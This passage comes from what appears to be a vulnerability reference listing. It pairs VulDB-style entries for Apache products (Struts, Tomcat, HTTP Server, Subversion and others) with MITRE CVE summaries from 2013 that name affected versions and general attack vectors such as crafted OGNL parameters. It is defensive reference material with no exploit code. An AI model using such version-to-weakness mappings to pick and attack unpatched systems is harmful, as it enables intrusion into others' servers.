9977| [65385] Apache Solr up to 2.2.1 on TYPO3 unknown vulnerability
9978| [11044] Apache Struts 2.3.15.3 showConfig.action cross site scripting
9979| [11043] Apache Struts 2.3.15.3 actionNames.action cross site scripting
9980| [11018] cPanel WHM up to 11.40.0.11 Apache mod_userdir Tweak Interface privilege escalation
9981| [65342] Apache Sling 1.0.2/1.0.4/1.0.6/1.1.0/1.1.2 Auth Core cross site scripting
9982| [65340] Apache Shindig 2.5.0 information disclosure
9983| [65316] Apache Mod Fcgid up to 2.3.7 mod_fcgid fcgid_bucket.c fcgid_header_bucket_read memory corruption
9984| [65313] Apache Sling 2.2.0/2.3.0 AbstractCreateOperation.java deepGetOrCreateNode denial of service
9985| [10826] Apache Struts 2 File privilege escalation
9986| [65204] Apache Camel up to 2.10.1 unknown vulnerability
9987| [10460] Apache Struts 2.0.0/2.3.15.1 Action Mapping Mechanism Bypass privilege escalation
9988| [10459] Apache Struts 2.0.0/2.3.15 Dynamic Method Invocation unknown vulnerability
9989| [10160] Apache Subversion 1.8.0/1.8.1/1.8.2 svnwcsub.py handle_options race condition
9990| [10159] Apache Subversion up to 1.8.2 svnserve write_pid_file race condition
9991| [10158] Apache Subversion 1.8.0/1.8.1/1.8.2 daemonize.py daemon::daemonize race condition
9992| [10157] Apache Subversion up to 1.8.1 FSFS Repository Symlink privilege escalation
9993| [64808] Fail2ban up to 0.8.9 apache-auth.conf denial of service
9994| [64760] Best Practical RT up to 4.0.12 Apache::Session::File information disclosure
9995| [64722] Apache XML Security for C++ Heap-based memory corruption
9996| [64719] Apache XML Security for C++ Heap-based memory corruption
9997| [64718] Apache XML Security for C++ verify denial of service
9998| [64717] Apache XML Security for C++ getURIBaseTXFM memory corruption
9999| [64716] Apache XML Security for C++ spoofing
10000| [64701] Apache CXF up to 2.7.3 XML Parser Memory Consumption denial of service
10001| [64700] Apache CloudStack up to 4.1.0 Stack-Based cross site scripting
10002| [64667] Apache Open For Business Project up to 10.04.04 unknown vulnerability
10003| [64666] Apache Open For Business Project up to 10.04.04 cross site scripting
10004| [9891] Apache HTTP Server 2.2.22 suEXEC Feature .htaccess information disclosure
10005| [64509] Apache ActiveMQ up to 5.8.0 scheduled.jsp cross site scripting
10006| [9826] Apache Subversion up to 1.8.0 mod_dav_svn denial of service
10007| [9683] Apache HTTP Server 2.4.5 mod_session_dbd denial of service
10008| [64485] Apache Struts up to 2.2.3.0 privilege escalation
10009| [9568] Apache Struts up to 2.3.15 DefaultActionMapper cross site request forgery
10010| [9567] Apache Struts up to 2.3.15 DefaultActionMapper memory corruption
10011| [64467] Apache Geronimo 3.0 memory corruption
10012| [64466] Apache OpenJPA up to 2.2.1 Serialization memory corruption
10013| [64457] Apache Struts up to 2.2.3.0 cross site scripting
10014| [64326] Alejandro Garza Apachesolr Autocomplete up to 7.x-1.1 cross site scripting
10015| [9184] Apache Qpid up to 0.20 SSL misconfiguration
10016| [8935] Apache Subversion up to 1.7.9 FSFS Format Repository denial of service
10017| [8934] Apache Subversion up to 1.7.9 Svnserve Server denial of service
10018| [8933] Apache Subversion up to 1.6.21 check-mime-type.pl svnlook memory corruption
10019| [8932] Apache Subversion up to 1.6.21 svn-keyword-check.pl svnlook changed memory corruption
10020| [9022] Apache Struts up to 2.3.14.2 OGNL Expression memory corruption
10021| [8873] Apache Struts 2.3.14 privilege escalation
10022| [8872] Apache Struts 2.3.14 privilege escalation
10023| [8746] Apache HTTP Server Log File Terminal Escape Sequence Filtering mod_rewrite.c do_rewritelog privilege escalation
10024| [8666] Apache Tomcat up to 7.0.32 AsyncListener information disclosure
10025| [8665] Apache Tomcat up to 7.0.29 Chunked Transfer Encoding Extension Size denial of service
10026| [8664] Apache Tomcat up to 7.0.32 FORM Authentication weak authentication
10027| [64075] Apache Subversion up to 1.7.7 mod_dav_svn Crash denial of service
10028| [64074] Apache Subversion up to 1.7.8 mod_dav_svn NULL Pointer Dereference denial of service
10029| [64073] Apache Subversion up to 1.7.8 mod_dav_svn NULL Pointer Dereference denial of service
10030| [64072] Apache Subversion up to 1.7.7 mod_dav_svn NULL Pointer Dereference denial of service
10031| [64071] Apache Subversion up to 1.7.8 mod_dav_svn Memory Consumption denial of service
10032| [8768] Apache Struts up to 2.3.14 on Mac EL and OGNL Interpreter memory corruption
10033| [64006] Apache ActiveMQ up to 5.7.0 denial of service
10034| [64005] Apache ActiveMQ up to 5.7.0 Default Configuration denial of service
10035| [64004] Apache ActiveMQ up to 5.7.0 PortfolioPublishServlet.java cross site scripting
10036| [8427] Apache Tomcat Session Transaction weak authentication
10037| [63960] Apache Maven 3.0.4 Default Configuration spoofing
10038| [63751] Apache qpid up to 0.20 qpid::framing::Buffer denial of service
10039| [63750] Apache qpid up to 0.20 checkAvailable denial of service
10040| [63749] Apache Qpid up to 0.20 Memory Consumption denial of service
10041| [63748] Apache Qpid up to 0.20 Default Configuration denial of service
10042| [63747] Apache Rave up to 0.20 User Account information disclosure
10043| [7889] Apache Subversion up to 1.6.17 mod_dav_svn/svn_fs_file_length() denial of service
10044| [63646] Apache HTTP Server up to 2.2.23/2.4.3 mod_proxy_balancer.c balancer_handler cross site scripting
10045| [7688] Apache CXF up to 2.7.1 WSS4JInterceptor Bypass weak authentication
10046| [7687] Apache CXF up to 2.7.2 Token weak authentication
10047| [63334] Apache CXF up to 2.6.0 WS-Security unknown vulnerability
10048| [63299] Apache CXF up to 2.6.0 WS-Security unknown vulnerability
10049| [7202] Apache HTTP Server 2.4.2 on Oracle Solaris ld_library_path cross site scripting
10050| [7075] Apache Tomcat up to 6.0.35/7.0.27 NIO Connector NioEndpoint.java denial of service
10051| [7074] Apache Tomcat up to 6.0.35/7.0.29 FORM Authentication RealmBase.java weak authentication
10052| [7073] Apache Tomcat up to 6.0.35/7.0.31 CSRF Prevention Filter cross site request forgery
10053| [63090] Apache Tomcat up to 4.1.24 denial of service
10054| [63089] Apache HTTP Server up to 2.2.13 mod_proxy_ajp denial of service
10055| [62933] Apache Tomcat up to 5.5.0 Access Restriction unknown vulnerability
10056| [62929] Apache Tomcat up to 6.0.35/7.0.27 NIO Connector Memory Consumption denial of service
10057| [62833] Apache CXF -/2.6.0 spoofing
10058| [62832] Apache Axis2 up to 1.6.2 spoofing
10059| [62831] Apache Axis up to 1.4 Java Message Service spoofing
10060| [62830] Apache Commons-httpclient 3.0 Payments spoofing
10061| [62826] Apache Libcloud up to 0.11.0 spoofing
10062| [62757] Apache Open For Business Project up to 10.04.0 unknown vulnerability
10063| [8830] Red Hat JBoss Enterprise Application Platform 6.0.1 org.apache.catalina.connector.Response.encodeURL information disclosure
10064| [62661] Apache Axis2 unknown vulnerability
10065| [62658] Apache Axis2 unknown vulnerability
10066| [62467] Apache Qpid up to 0.17 denial of service
10067| [62417] Apache CXF 2.4.7/2.4.8/2.5.3/2.5.4/2.6.1 spoofing
10068| [6301] Apache HTTP Server mod_pagespeed cross site scripting
10069| [6300] Apache HTTP Server mod_pagespeed Hostname information disclosure
10070| [6123] Apache Wicket up to 1.5.7 Ajax Link cross site scripting
10071| [62035] Apache Struts up to 2.3.4 denial of service
10072| [61916] Apache QPID 0.5/0.6/0.14/0.16 unknown vulnerability
10073| [6998] Apache Tomcat 5.5.35/6.0.35/7.0.28 DIGEST Authentication Session State Caching privilege escalation
10074| [6997] Apache Tomcat 5.5.35/6.0.35/7.0.28 HTTP Digest Authentication Implementation privilege escalation
10075| [6092] Apache HTTP Server 2.4.0/2.4.1/2.4.2 mod_proxy_ajp.c information disclosure
10076| [6090] Apache HTTP Server 2.4.0/2.4.1/2.4.2 mod_proxy_http.c information disclosure
10077| [61507] Apache POI up to 3.8 UnhandledDataStructure denial of service
10078| [6070] Apache Struts up to 2.3.4 Token Name Configuration Parameter privilege escalation
10079| [6069] Apache Struts up to 2.3.4 Request Parameter OGNL Expression denial of service
10080| [5764] Oracle Solaris 10 Apache HTTP Server information disclosure
10081| [5700] Oracle Secure Backup 10.3.0.3/10.4.0.1 Apache denial of service
10082| [61255] Apache Hadoop 2.0.0 Kerberos unknown vulnerability
10083| [61229] Apache Sling up to 2.1.1 denial of service
10084| [61152] Apache Commons-compress 1.0/1.1/1.2/1.3/1.4 denial of service
10085| [61094] Apache Roller up to 5.0 cross site scripting
10086| [61093] Apache Roller up to 5.0 cross site request forgery
10087| [61005] Apache OpenOffice 3.3/3.4 unknown vulnerability
10088| [9673] Apache HTTP Server up to 2.4.4 mod_dav mod_dav.c Request denial of service
10089| [5436] Apache OpenOffice 3.3/3.4 WPXContentListener.cpp _closeTableRow File memory corruption
10090| [5435] Apache OpenOffice 3.3/3.4 vclmi.dll File memory corruption
10091| [60730] PHP 5.4.0/5.4.1/5.4.2 apache_request_headers memory corruption
10092| [60708] Apache Qpid 0.12 unknown vulnerability
10093| [5032] Apache Hadoop up to 0.20.205.0/1.0.1/0.23.1 Kerberos/MapReduce Security Feature privilege escalation
10094| [4949] Apache Struts File Upload XSLTResult.java XSLT File privilege escalation
10095| [4955] Apache Traffic Server 3.0.3/3.1.2 HTTP Header Parser memory corruption
10096| [4882] Apache Wicket up to 1.5.4 directory traversal
10097| [4881] Apache Wicket up to 1.4.19 cross site scripting
10098| [4884] Apache HTTP Server up to 2.3.6 mod_fcgid fcgid_spawn_ctl.c FcgidMaxProcessesPerClass HTTP Requests denial of service
10099| [60352] Apache Struts up to 2.2.3 memory corruption
10100| [60153] Apache Portable Runtime up to 1.4.3 denial of service
10101| [4598] Apache Struts 1.3.10 upload-submit.do cross site scripting
10102| [4597] Apache Struts 1.3.10 processSimple.do cross site scripting
10103| [4596] Apache Struts 2.0.14/2.2.3 struts2-rest-showcase/orders cross site scripting
10104| [4595] Apache Struts 2.0.14/2.2.3 struts2-showcase/person/editPerson.action cross site scripting
10105| [4583] Apache HTTP Server up to 2.2.21 Threaded MPM denial of service
10106| [4582] Apache HTTP Server up to 2.2.21 protocol.c information disclosure
10107| [4571] Apache Struts up to 2.3.1.2 privilege escalation
10108| [4557] Apache Tomcat up to 7.0.21 Caching/Recycling information disclosure
10109| [59934] Apache Tomcat up to 6.0.9 DigestAuthenticator.java unknown vulnerability
10110| [59933] Apache Tomcat up to 6.0.9 Access Restriction unknown vulnerability
10111| [59932] Apache Tomcat up to 6.0.9 unknown vulnerability
10112| [59931] Apache Tomcat up to 6.0.9 Access Restriction information disclosure
10113| [59902] Apache Struts up to 2.2.3 Interfaces unknown vulnerability
10114| [4528] Apache Struts up to 2.2.3 DebuggingInterceptor privilege escalation
10115| [4527] Apache Struts up to 2.2.3 ExceptionDelegator cross site scripting
10116| [59888] Apache Tomcat up to 6.0.6 denial of service
10117| [59886] Apache ActiveMQ up to 5.5.1 Crash denial of service
10118| [4513] Apache Struts up to 2.3.1 ParameterInterceptor directory traversal
10119| [4512] Apache Struts up to 2.2.3 CookieInterceptor privilege escalation
10120| [59850] Apache Geronimo up to 2.2.1 denial of service
10121| [59825] Apache HTTP Server up to 2.1.7 mod_reqtimeout denial of service
10122| [59556] Apache HTTP Server up to 2.0.53 mod_proxy information disclosure
10123| [58467] Apache libcloud 0.2.0/0.3.0/0.3.1/0.4.0 Access Restriction spoofing
10124| [58413] Apache Tomcat up to 6.0.10 spoofing
10125| [58381] Apache Wicket up to 1.4.17 cross site scripting
10126| [58296] Apache Tomcat up to 7.0.19 unknown vulnerability
10127| [57888] Apache HttpClient 4.0/4.0.1/4.1 Authorization information disclosure
10128| [57587] Apache Subversion up to 1.6.16 mod_dav_svn information disclosure
10129| [57585] Apache Subversion up to 1.6.16 mod_dav_svn Memory Consumption denial of service
10130| [57584] Apache Subversion up to 1.6.4 mod_dav_svn NULL Pointer Dereference denial of service
10131| [57577] Apache Rampart-C 1.3.0 Access Restriction rampart_timestamp_token_validate privilege escalation
10132| [57568] Apache Archiva up to 1.3.4 cross site scripting
10133| [57567] Apache Archiva up to 1.3.4 cross site request forgery
10134| [57481] Apache Tomcat 7.0.12/7.0.13 Access Restriction unknown vulnerability
10135| [4355] Apache HTTP Server APR apr_fnmatch denial of service
10136| [57435] Apache Struts up to 2.2.1.1 FileHandler.java cross site scripting
10137| [57425] Apache Struts up to 2.2.1.1 cross site scripting
10138| [4352] Apache HTTP Server 2.2.x APR apr_fnmatch denial of service
10139| [57025] Apache Tomcat up to 7.0.11 information disclosure
10140| [57024] Apache Tomcat 7.0.11 Access Restriction information disclosure
10141| [56774] IBM WebSphere Application Server up to 7.0.0.14 org.apache.jasper.runtime.JspWriterImpl.response denial of service
10142| [56824] Apache Subversion up to 1.6.4 mod_dav_svn NULL Pointer Dereference denial of service
10143| [56832] Apache Tomcat up to 7.0.10 Access Restriction information disclosure
10144| [56830] Apache Tomcat up to 7.0.9 Access Restriction privilege escalation
10145| [12440] Apache Tomcat 6.0.33 Malicious Request cross site scripting
10146| [56512] Apache Continuum up to 1.4.0 cross site scripting
10147| [4285] Apache Tomcat 5.x JVM getLocale denial of service
10148| [4284] Apache Tomcat 5.x HTML Manager Infinite Loop cross site scripting
10149| [4283] Apache Tomcat 5.x ServletContect privilege escalation
10150| [56441] Apache Tomcat up to 7.0.6 denial of service
10151| [56300] Apache CouchDB up to 1.0.1 Web Administration Interface cross site scripting
10152| [55967] Apache Subversion up to 1.6.4 rev_hunt.c denial of service
10153| [55966] Apache Subversion up to 1.6.4 mod_dav_svn repos.c walk denial of service
10154| [55095] Apache Axis2 up to 1.6 Default Password memory corruption
10155| [55631] Apache Archiva up to 1.3.1 User Account cross site request forgery
10156| [55556] Apache Tomcat up to 6.0.29 Default Configuration information disclosure
10157| [55553] Apache Tomcat up to 7.0.4 sessionsList.jsp cross site scripting
10158| [55162] Apache MyFaces up to 2.0.0 Authentication Code unknown vulnerability
10159| [54881] Apache Subversion up to 1.6.12 mod_dav_svn authz.c privilege escalation
10160| [54879] Apache APR-util up to 0.9.14 mod_reqtimeout apr_brigade_split_line denial of service
10161| [54693] Apache Traffic Server DNS Cache unknown vulnerability
10162| [54416] Apache CouchDB up to 0.11.0 cross site request forgery
10163| [54394] Apache CXF up to 2.2.8 Memory Consumption denial of service
10164| [54261] Apache Tomcat jsp/cal/cal2.jsp cross site scripting
10165| [54166] Apache HTTP Server up to 2.2.12 mod_cache Crash denial of service
10166| [54385] Apache Struts up to 2.1.8.1 ParameterInterceptor unknown vulnerability
10167| [54012] Apache Tomcat up to 6.0.10 denial of service
10168| [53763] Apache Axis2 1.3/1.4/1.4.1/1.5/1.5.1 Memory Consumption denial of service
10169| [53368] Apache MyFaces 1.1.7/1.2.8 cross site scripting
10170| [53397] Apache axis2 1.4.1/1.5.1 Administration Console cross site scripting
10171| [52894] Apache Tomcat up to 6.0.7 information disclosure
10172| [52960] Apache ActiveMQ up to 5.4-snapshot information disclosure
10173| [52843] Apache HTTP Server mod_auth_shadow unknown vulnerability
10174| [52786] Apache Open For Business Project up to 09.04 cross site scripting
10175| [52587] Apache ActiveMQ up to 5.3.0 cross site request forgery
10176| [52586] Apache ActiveMQ up to 5.3.0 cross site scripting
10177| [52584] Apache CouchDB up to 0.10.1 information disclosure
10178| [51757] Apache HTTP Server 2.0.44 cross site scripting
10179| [51756] Apache HTTP Server 2.0.44 spoofing
10180| [51717] Apache HTTP Server up to 1.3.3 mod_proxy ap_proxy_send_fb memory corruption
10181| [51690] Apache Tomcat up to 6.0 directory traversal
10182| [51689] Apache Tomcat up to 6.0 information disclosure
10183| [51688] Apache Tomcat up to 6.0 directory traversal
10184| [50886] HP Operations Manager 8.10 on Windows File Upload org.apache.catalina.manager.HTMLManagerServlet memory corruption
10185| [50802] Apache Tomcat up to 3.3 Default Password weak authentication
10186| [50626] Apache Solr 1.0.0 cross site scripting
10187| [49857] Apache HTTP Server mod_proxy_ftp cross site scripting
10188| [49856] Apache HTTP Server 2.2.13 mod_proxy_ftp ap_proxy_ftp_handler denial of service
10189| [49348] Apache Xerces-C++ 2.7.0 Stack-Based denial of service
10190| [86789] Apache Portable Runtime memory/unix/apr_pools.c unknown vulnerability
10191| [49283] Apache APR-util up to 1.3.8 apr-util misc/apr_rmm.c apr_rmm_realloc memory corruption
10192| [48952] Apache HTTP Server up to 1.3.6 mod_deflate denial of service
10193| [48626] Apache Tomcat up to 4.1.23 Access Restriction directory traversal
10194| [48431] Apache Tomcat up to 4.1.23 j_security_check cross site scripting
10195| [48430] Apache Tomcat up to 4.1.23 mod_jk denial of service
10196| [47801] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console cross site request forgery
10197| [47800] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console cross site scripting
10198| [47799] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console directory traversal
10199| [47648] Apache Tiles 2.1.0/2.1.1 cross site scripting
10200| [47640] Apache Struts 2.0.6/2.0.8/2.0.9/2.0.11/2.1 cross site scripting
10201| [47638] Apache Tomcat up to 4.1.23 mod_jk information disclosure
10202| [47636] Apache Struts 2.0.9 xip_client.html cross site scripting
10203| [47593] Apache Mod Perl 1 perl-status Apache::Status cross site scripting
10204| [47637] Apache Struts 1.0.2/1.1/1.2.4/1.2.7/1.2.8 cross site scripting
10205| [47239] Apache Struts up to 2.1.2 Beta struts directory traversal
10206| [47214] Apachefriends xampp 1.6.8 spoofing
10207| [47213] Apachefriends xampp 1.6.8 htaccess cross site request forgery
10208| [47162] Apachefriends XAMPP 1.4.4 weak authentication
10209| [47065] Apache Tomcat 4.1.23 cross site scripting
10210| [46834] Apache Tomcat up to 5.5.20 cross site scripting
10211| [46004] Apache Jackrabbit 1.4/1.5.0 search.jsp cross site scripting
10212| [49205] Apache Roller 2.3/3.0/3.1/4.0 Search cross site scripting
10213| [86625] Apache Struts directory traversal
10214| [44461] Apache Tomcat up to 5.5.0 information disclosure
10215| [44389] Apache Xerces-C++ XML Parser Memory Consumption denial of service
10216| [44352] Apache Friends XAMPP 1.6.8 adodb.php cross site scripting
10217| [43663] Apache Tomcat up to 6.0.16 directory traversal
10218| [43612] Apache Friends XAMPP 1.6.7 iart.php cross site scripting
10219| [43556] Apache HTTP Server up to 2.1.8 mod_proxy_ftp proxy_ftp.c cross site scripting
10220| [43516] Apache Tomcat up to 4.1.20 directory traversal
10221| [43509] Apache Tomcat up to 6.0.13 cross site scripting
10222| [42637] Apache Tomcat up to 6.0.16 cross site scripting
10223| [42325] Apache HTTP Server up to 2.1.8 Error Page cross site scripting
10224| [41838] Apache-SSL 1.3.34 1.57 expandcert privilege escalation
10225| [41091] Apache Software Foundation Mod Jk up to 2.0.1 mod_jk2 Stack-based memory corruption
10226| [40924] Apache Tomcat up to 6.0.15 information disclosure
10227| [40923] Apache Tomcat up to 6.0.15 unknown vulnerability
10228| [40922] Apache Tomcat up to 6.0 information disclosure
10229| [40710] Apache HTTP Server up to 2.0.61 mod_negotiation cross site scripting
10230| [40709] Apache HTTP Server up to 2.0.53 mod_negotiation cross site scripting
10231| [40656] Apache Tomcat 5.5.20 information disclosure
10232| [40503] Apache HTTP Server mod_proxy_ftp cross site scripting
10233| [40502] Apache HTTP Server up to 2.2.5 mod_proxy_balancer memory corruption
10234| [40501] Apache HTTP Server 2.2.6 mod_proxy_balancer cross site request forgery
10235| [40398] Apache HTTP Server up to 2.2 mod_proxy_balancer cross site scripting
10236| [40397] Apache HTTP Server up to 2.2 mod_proxy_balancer balancer_handler denial of service
10237| [40234] Apache Tomcat up to 6.0.15 directory traversal
10238| [40221] Apache HTTP Server 2.2.6 information disclosure
10239| [40027] David Castro Apache Authcas 0.4 sql injection
10240| [3495] Apache OpenOffice up to 2.3 Database Document Processor unknown vulnerability
10241| [3489] Apache HTTP Server 2.x HTTP Header cross site scripting
10242| [3414] Apache Tomcat WebDAV Stored privilege escalation
10243| [39489] Apache Jakarta Slide up to 2.1 directory traversal
10244| [39540] Apache Geronimo 2.0/2.0.1/2.0.2/2.1 unknown vulnerability
10245| [3310] Apache OpenOffice 1.1.3/2.0.4/2.2.1 TIFF Image Parser Heap-based memory corruption
10246| [38768] Apache HTTP Server up to 2.1.7 mod_autoindex.c cross site scripting
10247| [38952] Apache Geronimo 2.0.1/2.1 unknown vulnerability
10248| [38658] Apache Tomcat 4.1.31 cal2.jsp cross site request forgery
10249| [38524] Apache Geronimo 2.0 unknown vulnerability
10250| [3256] Apache Tomcat up to 6.0.13 cross site scripting
10251| [38331] Apache Tomcat 4.1.24 information disclosure
10252| [38330] Apache Tomcat 4.1.24 information disclosure
10253| [38185] Apache Tomcat 3.3/3.3.1/3.3.1a/3.3.2 Error Message CookieExample cross site scripting
10254| [37967] Apache Tomcat up to 4.1.36 Error Message sendmail.jsp cross site scripting
10255| [37647] Apache Derby 10.1.1.0/10.1.2.1/10.1.3.1 Authorization unknown vulnerability
10256| [37646] Apache Derby 10.1.1.0/10.1.2.1/10.1.3.1 unknown vulnerability
10257| [3141] Apache Tomcat up to 4.1.31 Accept-Language Header cross site scripting
10258| [3133] Apache Tomcat up to 6.0 HTTP cross site scripting
10259| [37292] Apache Tomcat up to 5.5.1 cross site scripting
10260| [3130] Apache OpenOffice 2.2.1 RTF Document Heap-based memory corruption
10261| [36981] Apache Tomcat JK Web Server Connector up to 1.2.22 mod_jk directory traversal
10262| [36892] Apache Tomcat up to 4.0.0 hello.jsp cross site scripting
10263| [37320] Apache MyFaces Tomahawk up to 1.1.4 cross site scripting
10264| [36697] Apache Tomcat up to 5.5.17 implicit-objects.jsp cross site scripting
10265| [36491] Apache Axis 1.0 Installation javaioFileNotFoundException information disclosure
10266| [36400] Apache Tomcat 5.5.15 mod_jk cross site scripting
10267| [36698] Apache Tomcat up to 4.0.0 cal2.jsp cross site scripting
10268| [36224] XAMPP Apache Distribution up to 1.6.0a adodb.php connect memory corruption
10269| [36225] XAMPP Apache Distribution 1.6.0a sql injection
10270| [2997] Apache httpd/Tomcat 5.5/6.0 directory traversal
10271| [35896] Apache Apache Test up to 1.29 mod_perl denial of service
10272| [35653] Avaya S8300 Cm 3.1.2 Apache Tomcat unknown vulnerability
10273| [35402] Apache Tomcat JK Web Server Connector 1.2.19 mod_jk.so map_uri_to_worker memory corruption
10274| [35067] Apache Stats up to 0.0.2 extract unknown vulnerability
10275| [35025] Apache Stats up to 0.0.3 extract unknown vulnerability
10276| [34252] Apache HTTP Server denial of service
10277| [2795] Apache OpenOffice 2.0.4 WMF/EMF File Heap-based memory corruption
10278| [33877] Apache Opentaps 0.9.3 cross site scripting
10279| [33876] Apache Open For Business Project unknown vulnerability
10280| [33875] Apache Open For Business Project cross site scripting
10281| [2703] Apache Jakarta Tomcat up to 5.x der_get_oid memory corruption
10282| [2611] Apache HTTP Server up to 1.0.1 set_var Format String
10283|
10284| MITRE CVE - https://cve.mitre.org:
10285| [CVE-2013-4156] Apache OpenOffice.org (OOo) before 4.0 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a crafted element in an OOXML document file.
10286| [CVE-2013-4131] The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through 1.7.10 and 1.8.x before 1.8.1 allows remote authenticated users to cause a denial of service (assertion failure or out-of-bounds read) via a certain (1) COPY, (2) DELETE, or (3) MOVE request against a revision root.
10287| [CVE-2013-3239] phpMyAdmin 3.5.x before 3.5.8 and 4.x before 4.0.0-rc3, when a SaveDir directory is configured, allows remote authenticated users to execute arbitrary code by using a double extension in the filename of an export file, leading to interpretation of this file as an executable file by the Apache HTTP Server, as demonstrated by a .php.sql filename.
10288| [CVE-2013-3060] The web console in Apache ActiveMQ before 5.8.0 does not require authentication, which allows remote attackers to obtain sensitive information or cause a denial of service via HTTP requests.
10289| [CVE-2013-2765] The ModSecurity module before 2.7.4 for the Apache HTTP Server allows remote attackers to cause a denial of service (NULL pointer dereference, process crash, and disk consumption) via a POST request with a large body and a crafted Content-Type header.
10290| [CVE-2013-2251] Apache Struts 2.0.0 through 2.3.15 allows remote attackers to execute arbitrary OGNL expressions via a parameter with a crafted (1) action:, (2) redirect:, or (3) redirectAction: prefix.
10291| [CVE-2013-2249] mod_session_dbd.c in the mod_session_dbd module in the Apache HTTP Server before 2.4.5 proceeds with save operations for a session without considering the dirty flag and the requirement for a new session ID, which has unspecified impact and remote attack vectors.
10292| [CVE-2013-2248] Multiple open redirect vulnerabilities in Apache Struts 2.0.0 through 2.3.15 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in a parameter using the (1) redirect: or (2) redirectAction: prefix.
10293| [CVE-2013-2189] Apache OpenOffice.org (OOo) before 4.0 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via invalid PLCF data in a DOC document file.
10294| [CVE-2013-2135] Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted value that contains both "${}" and "%{}" sequences, which causes the OGNL code to be evaluated twice.
10295| [CVE-2013-2134] Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted action name that is not properly handled during wildcard matching, a different vulnerability than CVE-2013-2135.
10296| [CVE-2013-2115] Apache Struts 2 before 2.3.14.2 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag. NOTE: this issue is due to an incomplete fix for CVE-2013-1966.
10297| [CVE-2013-2071] java/org/apache/catalina/core/AsyncContextImpl.java in Apache Tomcat 7.x before 7.0.40 does not properly handle the throwing of a RuntimeException in an AsyncListener in an application, which allows context-dependent attackers to obtain sensitive request information intended for other applications in opportunistic circumstances via an application that records the requests that it processes.
10298| [CVE-2013-2067] java/org/apache/catalina/authenticator/FormAuthenticator.java in the form authentication feature in Apache Tomcat 6.0.21 through 6.0.36 and 7.x before 7.0.33 does not properly handle the relationships between authentication requirements and sessions, which allows remote attackers to inject a request into a session by sending this request during completion of the login form, a variant of a session fixation attack.
10299| [CVE-2013-1966] Apache Struts 2 before 2.3.14.1 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag.
10300| [CVE-2013-1965] Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.1, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.
10301| [CVE-2013-1896] mod_dav.c in the Apache HTTP Server before 2.2.25 does not properly determine whether DAV is enabled for a URI, which allows remote attackers to cause a denial of service (segmentation fault) via a MERGE request in which the URI is configured for handling by the mod_dav_svn module, but a certain href attribute in XML data refers to a non-DAV URI.
10302| [CVE-2013-1884] The mod_dav_svn Apache HTTPD server module in Subversion 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (segmentation fault and crash) via a log REPORT request with an invalid limit, which triggers an access of an uninitialized variable.
10303| [CVE-2013-1879] Cross-site scripting (XSS) vulnerability in scheduled.jsp in Apache ActiveMQ 5.8.0 and earlier allows remote attackers to inject arbitrary web script or HTML via vectors involving the "cron of a message."
10304| [CVE-2013-1862] mod_rewrite.c in the mod_rewrite module in the Apache HTTP Server 2.2.x before 2.2.25 writes data to a log file without sanitizing non-printable characters, which might allow remote attackers to execute arbitrary commands via an HTTP request containing an escape sequence for a terminal emulator.
10305| [CVE-2013-1849] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x through 1.6.20 and 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via a PROPFIND request for an activity URL.
10306| [CVE-2013-1847] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.0 through 1.6.20 and 1.7.0 through 1.7.8 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via an anonymous LOCK for a URL that does not exist.
10307| [CVE-2013-1846] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x before 1.6.21 and 1.7.0 through 1.7.8 allows remote authenticated users to cause a denial of service (NULL pointer dereference and crash) via a LOCK on an activity URL.
10308| [CVE-2013-1845] The mod_dav_svn Apache HTTPD server module in Subversion 1.6.x before 1.6.21 and 1.7.0 through 1.7.8 allows remote authenticated users to cause a denial of service (memory consumption) by (1) setting or (2) deleting a large number of properties for a file or directory.
10309| [CVE-2013-1814] The users/get program in the User RPC API in Apache Rave 0.11 through 0.20 allows remote authenticated users to obtain sensitive information about all user accounts via the offset parameter, as demonstrated by discovering password hashes in the password field of a response.
10310| [CVE-2013-1777] The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as used in IBM WebSphere Application Server (WAS) Community Edition 3.0.0.3 and other products, does not property implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object.
10311| [CVE-2013-1768] The BrokerFactory functionality in Apache OpenJPA 1.x before 1.2.3 and 2.x before 2.2.2 creates local executable JSP files containing logging trace data produced during deserialization of certain crafted OpenJPA objects, which makes it easier for remote attackers to execute arbitrary code by creating a serialized object and leveraging improperly secured server programs.
10312| [CVE-2013-1088] Cross-site request forgery (CSRF) vulnerability in Novell iManager 2.7 before SP6 Patch 1 allows remote attackers to hijack the authentication of arbitrary users by leveraging improper request validation by iManager code deployed within an Apache Tomcat container.
10313| [CVE-2013-1048] The Debian apache2ctl script in the apache2 package squeeze before 2.2.16-6+squeeze11, wheezy before 2.2.22-13, and sid before 2.2.22-13 for the Apache HTTP Server on Debian GNU/Linux does not properly create the /var/lock/apache2 lock directory, which allows local users to gain privileges via an unspecified symlink attack.
10314| [CVE-2013-0966] The Apple mod_hfs_apple module for the Apache HTTP Server in Apple Mac OS X before 10.8.3 does not properly handle ignorable Unicode characters, which allows remote attackers to bypass intended directory authentication requirements via a crafted pathname in a URI.
10315| [CVE-2013-0942] Cross-site scripting (XSS) vulnerability in EMC RSA Authentication Agent 7.1 before 7.1.1 for Web for Internet Information Services, and 7.1 before 7.1.1 for Web for Apache, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
